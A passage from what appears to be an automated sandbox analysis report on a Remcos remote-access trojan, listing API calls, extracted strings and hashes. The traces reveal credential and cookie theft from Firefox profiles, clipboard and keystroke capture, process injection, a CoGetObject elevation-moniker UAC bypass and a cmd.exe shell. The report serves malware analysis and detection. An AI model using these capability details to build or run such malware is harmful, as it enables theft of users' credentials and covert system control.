                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                          • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                          • CloseHandle.KERNEL32 ref: 00405A23
                                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                                          • CloseHandle.KERNEL32 ref: 00405A45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                          • API String ID: 2994406822-18413064
                                                          • Opcode ID: df35c5f414a0ea2482caa02798ea6fec16d77c9a455e207c7b93a2ec8369e6f2
                                                          • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                          • Opcode Fuzzy Hash: df35c5f414a0ea2482caa02798ea6fec16d77c9a455e207c7b93a2ec8369e6f2
                                                          • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                            • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                            • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                            • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                          • OpenMutexA.KERNEL32 ref: 00412146
                                                          • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                          • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                          • API String ID: 3018269243-13974260
                                                          • Opcode ID: 94cd0e690e29393e168c36f2201fa927646a70d566ab7c517b625d411d554f8e
                                                          • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                          • Opcode Fuzzy Hash: 94cd0e690e29393e168c36f2201fa927646a70d566ab7c517b625d411d554f8e
                                                          • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                          • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                          • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                          • API String ID: 1164774033-3681987949
                                                          • Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                          • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                          • Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                          • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 004168C2
                                                          • EmptyClipboard.USER32 ref: 004168D0
                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                          • GlobalLock.KERNEL32 ref: 004168F9
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                          • SetClipboardData.USER32 ref: 00416938
                                                          • CloseClipboard.USER32 ref: 00416955
                                                          • OpenClipboard.USER32 ref: 0041695C
                                                          • GetClipboardData.USER32 ref: 0041696C
                                                          • GlobalLock.KERNEL32 ref: 00416975
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                          • CloseClipboard.USER32 ref: 00416984
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                          • String ID: !D@
                                                          • API String ID: 3520204547-604454484
                                                          • Opcode ID: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                                                          • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                          • Opcode Fuzzy Hash: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                                                          • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                          • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                          • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                          • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$File$FirstNext
                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 3527384056-432212279
                                                          • Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                          • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                          • Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                          • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,[), ref: 0040F48E
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040F563
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$[
                                                          • API String ID: 3756808967-3769191571
                                                          • Opcode ID: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                                                          • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                          • Opcode Fuzzy Hash: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                                                          • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                          APIs
                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                          • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                          • CloseHandle.KERNEL32(?), ref: 00413465
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                          • String ID:
                                                          • API String ID: 297527592-0
                                                          • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                          • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                          • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                          • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$1$2$3$4$5$6$7$VG
                                                          • API String ID: 0-1861860590
                                                          • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                          • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                          • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                          • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00407521
                                                          • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object_wcslen
                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          • API String ID: 240030777-3166923314
                                                          • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                          • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                          • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                          • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                          • GetLastError.KERNEL32 ref: 0041A7BB
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                          • String ID:
                                                          • API String ID: 3587775597-0
                                                          • Opcode ID: 6acfec477c33960adb53ca531a04b71f608e95b4af76d4dccda85eb8d0b50c1e
                                                          • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                          • Opcode Fuzzy Hash: 6acfec477c33960adb53ca531a04b71f608e95b4af76d4dccda85eb8d0b50c1e
                                                          • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                          • String ID: lJD$lJD$lJD
                                                          • API String ID: 745075371-479184356
                                                          • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                          • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                          • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                          • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                          • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                          • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 1164774033-405221262
                                                          • Opcode ID: 66fe6d6053e6612d2a3ee79fceeb28f858ac6dc921cc8d7f836653099c7867af
                                                          • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                          • Opcode Fuzzy Hash: 66fe6d6053e6612d2a3ee79fceeb28f858ac6dc921cc8d7f836653099c7867af
                                                          • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                          • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2341273852-0
                                                          • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                          • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                          • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                          • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$CreateFirstNext
                                                          • String ID: PXG$PXG$NG$PG$[
                                                          • API String ID: 341183262-3585181436
                                                          • Opcode ID: 4f3f2bb5b9da1bfddcb4cd134f9a5875621ae29ad64c28cf705f7750fff6e69f
                                                          • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                          • Opcode Fuzzy Hash: 4f3f2bb5b9da1bfddcb4cd134f9a5875621ae29ad64c28cf705f7750fff6e69f
                                                          • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                          • String ID:
                                                          • API String ID: 1888522110-0
                                                          • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                          • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                          • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                          • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                                                          • RegCloseKey.ADVAPI32(?), ref: 004140A9
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                          • API String ID: 2127411465-314212984
                                                          • Opcode ID: a4f849b2b5db47811b40edba2969bc8ccf5af81e9b2106660676366c5f772689
                                                          • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                          • Opcode Fuzzy Hash: a4f849b2b5db47811b40edba2969bc8ccf5af81e9b2106660676366c5f772689
                                                          • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                          APIs
                                                          • _free.LIBCMT ref: 00449212
                                                          • _free.LIBCMT ref: 00449236
                                                          • _free.LIBCMT ref: 004493BD
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                          • _free.LIBCMT ref: 00449589
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID:
                                                          • API String ID: 314583886-0
                                                          • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                          • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                          • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                          • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                          APIs
                                                            • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                            • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                            • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                            • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                            • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                          • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
